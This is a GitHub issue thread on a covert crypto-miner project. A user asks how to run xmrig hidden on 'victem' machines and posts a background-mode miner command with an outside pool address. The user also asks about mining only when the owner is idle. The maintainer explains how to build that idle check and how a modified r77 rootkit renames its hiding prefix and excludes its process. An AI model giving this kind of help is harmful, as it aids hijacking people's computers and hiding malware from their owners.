### ISSUE TITLE
normal xmrig.exe

### ISSUE THREAD

**Issue by DARK-DEVIL-66** [UnamSanctam/SilentCryptoMiner#2029]
2.whats is the actual mean ldle mining ?

--cpu-priority=N | set process priority (0 idle, 2 normal to 5 highest)

**Comment by DARK-DEVIL-66** [comment]
i asked quation about connect normal xmrig.exe with  xm-proxy

**Comment by DARK-DEVIL-66** [comment]
when i run normal xmrig exe i need to specify the fallowing parameters ?

xmrig.exe -o 221.254.73.583:8888 --tls -B --background --cpu-max-threads-hint=20 --nicehash --donate-level=0  --donate-over-proxy=0

**Comment by DARK-DEVIL-66** [comment]
for conecting victem with proxy ?

**Comment by DARK-DEVIL-66** [comment]
can ican i do that with batch file check idle status  when user is idle execute idle command ?

**Comment by UnamSanctam** [comment]
You'll either have to edit the xmrig.exe code, or you'll have to create a program that checks if the user is idle, and if it is then you'll have to change a config.json or restart the miner with a different `--cpu-max-threads-hint`.

**Comment by DARK-DEVIL-66** [comment]
i try to complie xmrig source code but i don;t know how is done exctractly i have installed cmake
do you have any tutorials ?

like your xmrig

**Comment by UnamSanctam** [comment]
Here's guides for how to compile it on Windows: https://xmrig.com/docs/miner/build/windows

**Comment by DARK-DEVIL-66** [comment]
if you can share with me your xmrig source code ?
(moddified)

**Comment by DARK-DEVIL-66** [comment]
also rootkit modified source code ?

**Comment by UnamSanctam** [comment]
>if you can share with me your xmrig source code ?
(moddified)

Currently I don't have repositories for the two miners, since I don't have the time to maintain them. But the code for the idle mining and how it's implemented (and how it works) I shared in this issue: https://github.com/UnamSanctam/SilentCryptoMiner/issues/1959

>also rootkit modified source code ?

The only difference in the newer rootkit versions is that the prefix is changed from $77 to dialer, and also that dialer.exe is excluded from the injection. Both those are changed in the configuration header in the r77-rootkit.
